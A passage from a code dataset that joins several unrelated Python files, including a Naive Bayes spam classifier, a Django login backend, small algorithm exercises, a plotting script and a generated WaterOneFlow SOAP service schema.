p_xi_cj_spam=(1/(np.sqrt(2*np.pi) * spam_x_std))*np.exp((-1)* (((row-spam_x_mean)**2)/(2*(spam_x_std**2))))
p_xi_cj_no_spam = (1/(np.sqrt(2*np.pi) * no_spam_x_std))*np.exp((-1)* (((row-no_spam_x_mean)**2)/(2*(no_spam_x_std**2))))
"""Normalizing the Gaussian Naive Bayes probablities """
p_xi_cj_spam[p_xi_cj_spam == 0.0] = 0.0001
p_xi_cj_no_spam[p_xi_cj_no_spam == 0.0] = 0.0001
log_naive_spam = np.sum(np.log(p_xi_cj_spam))
log_naive_no_spam = np.sum(np.log(p_xi_cj_no_spam))
no_spam_val = log_naive_no_spam+log_no_spam_prior
spam_val = log_naive_spam+log_spam_prior
return np.argmax([no_spam_val ,spam_val ])
"""This method has the final predictions of the Gaussian Naive Bayes Classifier for the dataset. """
def predict(train_data,test_data):
log_spam_prior , log_no_spam_prior , spam_x_mean , spam_x_std ,no_spam_x_mean , no_spam_x_std = calculate_probabilities(train_data)
predicted_output = []
for row in test_data:
row = row.reshape((len(row),1))
predicted_output.append(gaussian_naive_bayes_classifier
(log_spam_prior , log_no_spam_prior ,
spam_x_mean , spam_x_std ,no_spam_x_mean , no_spam_x_std,row))
return predicted_output
"""The main method gets the predictions of the classifier and computes the various metrics
such as recall , accuracy and precision and also computes the confusion matrix """
def main():
train_data,train_labels,test_data,test_labels = test_train_split()
predicted_output = predict(train_data,test_data[:,:57])
print("confusion matrix : \n" ,cm(test_labels,predicted_output))
print("Recall : ",recall(test_labels,predicted_output))
print("Accuracy:" , accuracy_score(test_labels,predicted_output)*100 , "%" )
print("precision : ",precision_score(test_labels,predicted_output))
if __name__== "__main__":
main()
|
990,986 | 36a408da5446c5ce29160f8b3e71c26eb622f03a | #!python3
# -*- coding: utf-8 -*-
"""
@Author: Anscor
@Date: 2020-04-06 10:15:47
@LastEditors: Anscor
@LastEditTime: 2020-04-06 10:15:48
@Description: 验证类
"""
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import User
from django.db.models import Q
from rest_framework import exceptions
class UserModelBackend(ModelBackend):
def authenticate(self, request, username=None, password=None, **kwargs):
email = kwargs.get("email", None)
phone = kwargs.get("phone", None)
student_number = kwargs.get("student_number", None)
if (
not username and not email and not phone and not student_number
) or not password:
return None
users = User.objects.select_related("profile").all()
if username:
user = users.filter(username=username).first()
elif student_number:
user = users.filter(student_number=student_number).first()
elif email:
user = users.filter(email=email).first()
else:
user = users.filter(phone=phone).first()
if not user:
raise exceptions.AuthenticationFailed("未找到对应的用户!")
if user.check_password(password):
return user
raise exceptions.AuthenticationFailed("认证失败!")
|
990,987 | f7372b7f99575296343100180cdd3424d04ea69f | class Solution:
def productExceptSelf(self, nums):
prefixProduct = 1
responseArr = []
for n in nums:
responseArr.append(prefixProduct)
prefixProduct *= n
suffixProduct = 1
for i in range(len(nums)-1, -1, -1):
responseArr[i] *= suffixProduct
suffixProduct *= nums[i]
return responseArr
s = Solution()
print(s.productExceptSelf([1,2,3,4]))
print(s.productExceptSelf([-1,1,0,-3,3]))
|
990,988 | 2b8b568c5d132b22487d850ab9b39b5e0443f4bb | ins = input()
ins = ins.strip("0")
print(["NO", "YES"][ins == ins[::-1]]) |
990,989 | 2fcabb86a182027dbae88144bb28d3141d7b771e | import re
from string import digits
from Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory
def process(txtString):
factory = StopWordRemoverFactory()
stopwords = factory.create_stop_word_remover()
remove_digits = str.maketrans('','',digits)
doc = txtString.translate(remove_digits)
doc = re.sub('[^A-Za-z0-9]+', ' ', doc)
doc = doc.lower()
return stopwords.remove(doc) |
990,990 | be316f6f289978c88cca39ecc081687689514513 | # -*- coding: utf-8 -*-
"""
Created on Mon Feb 3 13:45:08 2020
@author: lucas
"""
from urllib.request import urlopen
import json
import plotly.express as px
import pandas as pd
import numpy as np
data2 = pd.read_csv('../../../Data/countyPop2014_v3.csv',',',dtype = {'county': 'str'})
# select data syntax data1.loc[data1['county'] == 36061]
dfTest = pd.DataFrame()
dfTest['fips'] = data2['county']
dfTest['Population'] = data2['population']
with open('../../../Data/geojson-counties-fips.json') as json_file:
counties = json.load(json_file)
cNo = len(counties["features"])
test = np.ones((cNo))
#print(df)
fig = px.choropleth_mapbox(dfTest, geojson=counties, locations='fips', color='Population',
color_continuous_scale="Viridis",
mapbox_style="carto-positron",range_color=(0, 1000000),
zoom=3, center = {"lat": 37.0902, "lon": -95.7129},
opacity=0.5,
labels={'unemp':'unemployment rate'}
)
fig.update_layout(margin={"r":0,"t":0,"l":0,"b":0})
fig.show() |
990,991 | 9315787c8174999e8fefd970d7fd806244692785 | import unittest
from logutils import LogUtils
import os
import json
import time
logconfig = """
{
"loglevel" : "DEBUG",
"format" : "[%(asctime)s] %(message)s: %(levelname)s",
"dateFormat" : "%m/%d/%Y %I:%M:%S %p"
}
"""
class TestLogUtils(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
print('Tearing down')
pass
def test_logwrite_config(self):
logger = LogUtils("testlogger_cnf", json.loads(logconfig)).get_logger()
logger.error("Test log message")
# import pdb; pdb.set_trace()
logfile = open('testlogger_cnf.log','r')
logstr = logfile.read()
logfile.close()
# os.remove('testlogger_cnf.log')
self.assertTrue(logstr.find('Test log message') > -1)
self.assertTrue(logstr.find('ERROR') > -1)
self.assertTrue(logstr.find('ERROR') > logstr.find('Test log message'))
def test_logwrite_befault(self):
logger = LogUtils("testlogger_def").get_logger()
logger.warning("Test log message")
logfile = open('testlogger_def.log','r')
logstr = logfile.read()
logfile.close()
# os.remove('testlogger_def.log')
self.assertTrue(logstr.find('Test log message') > -1)
self.assertTrue(logstr.find('WARNING') > -1)
self.assertTrue(logstr.find('WARNING') < logstr.find('Test log message'))
if __name__ == '__main__':
unittest.main()
|
990,992 | 12c3665c80f4e18a6cba25f38964a2308800a86c | #! /usr/bin/env python3
import requests
import sys
import os
listOfFiles = []
srcDir = "/home/student-01-c4b067d66a1f/supplier-data/images/"
url = "http://localhost/upload/"
for (dirpath, dirname, filename) in os.walk(srcDir):
for file in filename:
if file.endswith(".jpeg"):
print(file)
listOfFiles.append(file)
for each in listOfFiles:
upload=(srcDir+each)
with open(upload, 'rb') as opened:
r = requests.post(url, files={'file': opened})
|
990,993 | d70c2c1ca161ba82a3e7d2a9ce2abbdfdd0e191a | ##################################################
# WaterOneFlow_services_server.py
# Generated by ZSI.generate.wsdl2dispatch.ServiceModuleWriter
#
##################################################
from WaterOneFlow_services import *
from ZSI.fault import Fault, ZSIFaultDetail
from ZSI.ServiceContainer import ServiceSOAPBinding
class WaterOneFlow(ServiceSOAPBinding):
soapAction = {}
root = {}
_wsdl = """<?xml version=\"1.0\" ?>
<wsdl:definitions targetNamespace=\"http://www.cuahsi.org/his/1.0/ws/\" xmlns:http=\"http://schemas.xmlsoap.org/wsdl/http/\" xmlns:mime=\"http://schemas.xmlsoap.org/wsdl/mime/\" xmlns:s=\"http://www.w3.org/2001/XMLSchema\" xmlns:s1=\"http://www.cuahsi.org/waterML/1.0/\" xmlns:soap=\"http://schemas.xmlsoap.org/wsdl/soap/\" xmlns:soap12=\"http://schemas.xmlsoap.org/wsdl/soap12/\" xmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:tm=\"http://microsoft.com/wsdl/mime/textMatching/\" xmlns:tns=\"http://www.cuahsi.org/his/1.0/ws/\" xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\">
<wsdl:documentation xmlns:wsdl=\"http://schemas.xmlsoap.org/wsdl/\"><div><strong>Developmental service. This service is internal CUAHSI use, and evaluation.</strong></div></wsdl:documentation>
<wsdl:types>
<s:schema elementFormDefault=\"qualified\" targetNamespace=\"http://www.cuahsi.org/his/1.0/ws/\">
<s:import namespace=\"http://www.cuahsi.org/waterML/1.0/\"/>
<s:element name=\"GetSitesXml\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"site\" type=\"tns:ArrayOfString\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:complexType name=\"ArrayOfString\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"string\" nillable=\"true\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
<s:element name=\"GetSitesXmlResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"GetSitesXmlResult\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSiteInfo\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"site\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSiteInfoResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"GetSiteInfoResult\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetVariableInfo\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetVariableInfoResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"GetVariableInfoResult\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSites\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"site\" type=\"tns:ArrayOfString\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSitesResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" ref=\"s1:sitesResponse\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSiteInfoObject\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"site\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetSiteInfoObjectResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" ref=\"s1:sitesResponse\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetVariableInfoObject\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetVariableInfoObjectResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" ref=\"s1:variablesResponse\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetValues\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"location\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"startDate\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"endDate\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetValuesResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"GetValuesResult\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetValuesObject\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"location\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"startDate\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"endDate\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"authToken\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name=\"GetValuesObjectResponse\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" ref=\"s1:timeSeriesResponse\"/>
</s:sequence>
</s:complexType>
</s:element>
</s:schema>
<s:schema elementFormDefault=\"qualified\" targetNamespace=\"http://www.cuahsi.org/waterML/1.0/\">
<s:element name=\"sitesResponse\" type=\"s1:SiteInfoResponseType\"/>
<s:complexType name=\"SiteInfoResponseType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"queryInfo\" type=\"s1:QueryInfoType\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"site\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"siteInfo\" type=\"s1:SiteInfoType\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"seriesCatalog\" type=\"s1:seriesCatalogType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
</s:sequence>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
<s:complexType name=\"QueryInfoType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"creationTime\" type=\"s:dateTime\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"queryURL\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"querySQL\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"criteria\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"locationParam\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variableParam\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeParam\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"beginDateTime\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"endDateTime\" type=\"s:string\"/>
</s:sequence>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
</s:sequence>
</s:complexType>
<s:complexType name=\"SiteInfoType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:SourceInfoType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"siteName\" type=\"s:string\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"siteCode\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"defaultId\" type=\"s:boolean\"/>
<s:attribute name=\"network\" type=\"s:normalizedString\"/>
<s:attribute name=\"siteID\" type=\"s:normalizedString\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeZoneInfo\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"defaultTimeZone\" nillable=\"true\">
<s:complexType>
<s:attribute name=\"ZoneAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"ZoneOffset\" type=\"s:string\"/>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"daylightSavingsTimeZone\" nillable=\"true\">
<s:complexType>
<s:attribute name=\"ZoneAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"ZoneOffset\" type=\"s:string\"/>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"geoLocation\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"geogLocation\" type=\"s1:GeogLocationType\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"localSiteXY\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"X\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"Y\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Z\" type=\"s:double\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
</s:sequence>
<s:attribute name=\"projectionInformation\" type=\"s:string\"/>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"elevation_m\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"verticalDatum\" type=\"s:string\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"altname\"/>
</s:sequence>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"SourceInfoType\"/>
<s:complexType name=\"DataSetInfoType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:SourceInfoType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataSetIdentifier\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeZoneInfo\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"defaultTimeZone\" nillable=\"true\">
<s:complexType>
<s:attribute name=\"ZoneAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"ZoneOffset\" type=\"s:string\"/>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"daylightSavingsTimeZone\" nillable=\"true\">
<s:complexType>
<s:attribute name=\"ZoneAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"ZoneOffset\" type=\"s:string\"/>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataSetDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataSetLocation\" type=\"s1:GeogLocationType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"GeogLocationType\">
<s:attribute default=\"EPSG:4326\" name=\"srs\" type=\"s:string\"/>
</s:complexType>
<s:complexType name=\"LatLonBoxType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:GeogLocationType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"south\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"west\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"north\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"east\" type=\"s:double\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"LatLonPointType\">
<s:complexContent mixed=\"false\">
<s:extension base=\"s1:GeogLocationType\">
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"latitude\" type=\"s:double\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"longitude\" type=\"s:double\"/>
</s:sequence>
</s:extension>
</s:complexContent>
</s:complexType>
<s:complexType name=\"seriesCatalogType\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"series\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataType\" type=\"s1:dataTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variable\" type=\"s1:VariableInfoType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"valueCount\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:int\">
<s:attribute name=\"countIsEstimated\" type=\"s:boolean\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variableTimeInterval\" type=\"s1:TimePeriodType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"valueType\" type=\"s1:valueTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"generalCategory\" type=\"s1:generalCategoryEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"sampleMedium\" type=\"s1:SampleMediumEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Method\" type=\"s1:MethodType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"Source\" type=\"s1:SourceType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"1\" name=\"QualityControlLevel\" nillable=\"true\" type=\"s1:QualityControlLevelType\"/>
</s:sequence>
</s:complexType>
</s:element>
</s:sequence>
<s:attribute name=\"menuGroupName\" type=\"s:string\"/>
<s:attribute name=\"serviceWsdl\" type=\"s:anyURI\"/>
</s:complexType>
<s:simpleType name=\"dataTypeEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Continuous\"/>
<s:enumeration value=\"Instantaneous\"/>
<s:enumeration value=\"Cumulative\"/>
<s:enumeration value=\"Incremental\"/>
<s:enumeration value=\"Average\"/>
<s:enumeration value=\"Maximum\"/>
<s:enumeration value=\"Minimum\"/>
<s:enumeration value=\"Constant Over Interval\"/>
<s:enumeration value=\"Categorical\"/>
<s:enumeration value=\"Best Easy Systematic Estimator \"/>
</s:restriction>
</s:simpleType>
<s:complexType name=\"VariableInfoType\">
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"variableCode\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:token\">
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
<s:attribute name=\"variableID\" type=\"s:integer\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variableName\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"variableDescription\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"valueType\" type=\"s1:valueTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"dataType\" type=\"s1:dataTypeEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"generalCategory\" type=\"s1:generalCategoryEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"sampleMedium\" type=\"s1:SampleMediumEnum\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"units\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"unitsAbbreviation\" type=\"s:normalizedString\"/>
<s:attribute name=\"unitsCode\" type=\"s:token\"/>
<s:attribute name=\"unitsType\" type=\"s1:UnitsTypeEnum\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"options\" type=\"s1:ArrayOfOption\"/>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"note\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"type\" type=\"s:string\"/>
<s:attribute name=\"href\" type=\"s:string\"/>
<s:attribute name=\"title\" type=\"s:string\"/>
<s:attribute name=\"show\" type=\"s:string\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"related\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"parentID\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
<s:element maxOccurs=\"unbounded\" minOccurs=\"0\" name=\"relatedID\">
<s:complexType>
<s:simpleContent>
<s:extension base=\"s:string\">
<s:attribute name=\"network\" type=\"s:string\"/>
<s:attribute name=\"vocabulary\" type=\"s:string\"/>
<s:attribute name=\"default\" type=\"s:boolean\"/>
</s:extension>
</s:simpleContent>
</s:complexType>
</s:element>
</s:sequence>
</s:complexType>
</s:element>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"extension\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"NoDataValue\" type=\"s:string\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeSupport\">
<s:complexType>
<s:sequence>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"unit\" type=\"s1:UnitsType\"/>
<s:element maxOccurs=\"1\" minOccurs=\"0\" name=\"timeInterval\" type=\"s:int\"/>
</s:sequence>
<s:attribute name=\"isRegular\" type=\"s:boolean\"/>
</s:complexType>
</s:element>
</s:sequence>
<s:attribute name=\"oid\" type=\"s:normalizedString\"/>
<s:attribute name=\"metadataDateTime\" type=\"s:dateTime\"/>
</s:complexType>
<s:simpleType name=\"valueTypeEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Field Observation\"/>
<s:enumeration value=\"Sample\"/>
<s:enumeration value=\"Model Simulation Result\"/>
<s:enumeration value=\"Derived Value\"/>
</s:restriction>
</s:simpleType>
<s:simpleType name=\"generalCategoryEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Water Quality\"/>
<s:enumeration value=\"Climate\"/>
<s:enumeration value=\"Hydrology\"/>
<s:enumeration value=\"Geology\"/>
<s:enumeration value=\"Biota\"/>
</s:restriction>
</s:simpleType>
<s:simpleType name=\"SampleMediumEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Surface Water\"/>
<s:enumeration value=\"Ground Water\"/>
<s:enumeration value=\"Sediment\"/>
<s:enumeration value=\"Soil\"/>
<s:enumeration value=\"Air\"/>
<s:enumeration value=\"Tissue\"/>
<s:enumeration value=\"Precipitation\"/>
</s:restriction>
</s:simpleType>
<s:simpleType name=\"UnitsTypeEnum\">
<s:restriction base=\"s:string\">
<s:enumeration value=\"Angle\"/>
<s:enumeration value=\"Area\"/>
<s:enumeration value=\"Dimensionless\"/>
<s:enumeration value=\"Energy\"/>
<s:enumeration value=\"Energy Flux\"/>
<s:enumeration value=\"Flow\"/>
<s:enumeration value=\"Force\"/>
<s:enumeration value=\"Frequency\"/>
<s:enumeration value=\"Length\"/>
<s:enumeration value=\"Light\"/>
<s:enumeration value=\"Mass\"/>
<s:enumeration value=\"Permeability\"/>
<s:enumeration value=\"Power\"/>
<s:enumeration value=\"Pressure/Stress\"/>
<s:enumeration value=\"Resolution\"/>
<s:enumeration value=\"Scale\"/>
<s:enumeration value=\"Temperature\"/>
<s:enumeration value=\"Time\"/>
<s:enumeration value=\"Velocity\"/>
<s:enumeration value=\"Volume\"/>
</s:restriction>
</s:simpleType>
<s:complexType name=\"ArrayOfOption\">
<s:sequence>
